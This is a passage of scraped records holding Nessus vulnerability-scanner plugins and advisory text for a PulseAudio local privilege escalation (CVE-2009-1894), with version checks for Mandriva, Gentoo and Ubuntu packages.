(rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64pulsezeroconf0-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libpulseaudio-devel-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libpulseaudio0-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libpulsecore5-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libpulseglib20-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libpulsezeroconf0-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-esound-compat-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-module-bluetooth-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-module-gconf-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-module-jack-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-module-lirc-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-module-x11-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-module-zeroconf-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pulseaudio-utils-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64pulseaudio-devel-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64pulseaudio0-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64pulseglib20-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64pulsezeroconf0-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libpulseaudio-devel-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libpulseaudio0-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libpulseglib20-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libpulsezeroconf0-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-esound-compat-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-bluetooth-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-gconf-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-jack-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-lirc-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-x11-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-zeroconf-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-utils-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:07:24", "description": "The remote host is affected by the vulnerability described in GLSA-200907-13 (PulseAudio: Local privilege escalation)\n\n Tavis Ormandy and Julien Tinnes of the Google Security Team discovered that the pulseaudio binary is installed setuid root, and does not drop privileges before re-executing itself. The vulnerability has independently been reported to oCERT by Yorick Koster.\n Impact :\n\n A local user who has write access to any directory on the file system containing /usr/bin can exploit this vulnerability using a race condition to execute arbitrary code with root privileges.\n Workaround :\n\n Ensure that the file system holding /usr/bin does not contain directories that are writable for unprivileged users.", "cvss3": {"score": null, "vector": null}, "published": "2009-07-17T00:00:00", "type": "nessus", "title": "GLSA-200907-13 : PulseAudio: Local privilege escalation", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:pulseaudio", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200907-13.NASL", "href": "https://www.tenable.com/plugins/nessus/39848", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200907-13.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39848);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1894\");\n script_xref(name:\"GLSA\", value:\"200907-13\");\n\n script_name(english:\"GLSA-200907-13 : PulseAudio: Local privilege escalation\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200907-13\n(PulseAudio: Local privilege escalation)\n\n Tavis Ormandy and Julien Tinnes of the Google Security Team discovered\n that the pulseaudio binary is installed setuid root, and does not drop\n privileges before re-executing itself. The vulnerability has\n independently been reported to oCERT by Yorick Koster.\n \nImpact :\n\n A local user who has write access to any directory on the file system\n containing /usr/bin can exploit this vulnerability using a race\n condition to execute arbitrary code with root privileges.\n \nWorkaround :\n\n Ensure that the file system holding /usr/bin does not contain\n directories that are writable for unprivileged users.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200907-13\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All PulseAudio users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-sound/pulseaudio-0.9.9-r54'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:pulseaudio\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-sound/pulseaudio\", unaffected:make_list(\"ge 0.9.9-r54\"), vulnerable:make_list(\"lt 0.9.9-r54\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"PulseAudio\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:07:07", "description": "Tavis Ormandy, Julien Tinnes, and Yorick Koster discovered that PulseAudio did not safely re-execute itself. A local attacker could exploit this to gain root privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2009-07-17T00:00:00", "type": "nessus", "title": "Ubuntu 8.04 LTS / 8.10 / 9.04 : pulseaudio vulnerability (USN-804-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libpulse-browse0", "p-cpe:/a:canonical:ubuntu_linux:libpulse-browse0-dbg", "p-cpe:/a:canonical:ubuntu_linux:libpulse-dev", "p-cpe:/a:canonical:ubuntu_linux:libpulse-mainloop-glib0", "p-cpe:/a:canonical:ubuntu_linux:libpulse-mainloop-glib0-dbg", "p-cpe:/a:canonical:ubuntu_linux:libpulse0", "p-cpe:/a:canonical:ubuntu_linux:libpulse0-dbg", "p-cpe:/a:canonical:ubuntu_linux:libpulsecore5", "p-cpe:/a:canonical:ubuntu_linux:libpulsecore5-dbg", "p-cpe:/a:canonical:ubuntu_linux:libpulsecore9", "p-cpe:/a:canonical:ubuntu_linux:libpulsecore9-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-esound-compat", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-esound-compat-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-gconf", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-gconf-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-hal", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-hal-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-lirc", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-lirc-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-x11", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-x11-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-zeroconf", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-zeroconf-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-utils", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-utils-dbg", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "cpe:/o:canonical:ubuntu_linux:8.10", "cpe:/o:canonical:ubuntu_linux:9.04"], "id": "UBUNTU_USN-804-1.NASL", "href": "https://www.tenable.com/plugins/nessus/39851", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-804-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39851);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2009-1894\");\n script_xref(name:\"USN\", value:\"804-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 8.10 / 9.04 : pulseaudio vulnerability (USN-804-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Tavis Ormandy, Julien Tinnes, and Yorick Koster discovered that\nPulseAudio did not safely re-execute itself. A local attacker could\nexploit this to gain root privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/804-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse-browse0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse-browse0-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse-mainloop-glib0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse-mainloop-glib0-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse0-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulsecore5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulsecore5-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulsecore9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulsecore9-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-esound-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-esound-compat-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-gconf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-gconf-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-hal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-hal-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-lirc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-lirc-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-x11-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-zeroconf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-zeroconf-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-utils-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(8\\.04|8\\.10|9\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 8.10 / 9.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse-browse0\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse-browse0-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse-dev\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse-mainloop-glib0\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse-mainloop-glib0-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse0\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse0-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulsecore5\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulsecore5-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-esound-compat\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-esound-compat-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-gconf\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-gconf-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-hal\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-hal-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-lirc\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-lirc-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-x11\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-x11-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-zeroconf\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-zeroconf-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-utils\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-utils-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse-browse0\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse-browse0-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse-dev\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse-mainloop-glib0\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse-mainloop-glib0-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse0\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse0-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulsecore5\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulsecore5-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-esound-compat\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-esound-compat-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-gconf\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-gconf-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-hal\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-hal-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-lirc\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-lirc-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-x11\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-x11-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-zeroconf\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-zeroconf-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-utils\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-utils-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse-browse0\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse-browse0-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse-dev\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse-mainloop-glib0\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse-mainloop-glib0-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse0\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse0-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulsecore9\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulsecore9-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio\", pkgver:\"1:0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-esound-compat\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-esound-compat-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-gconf\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-gconf-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-hal\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", 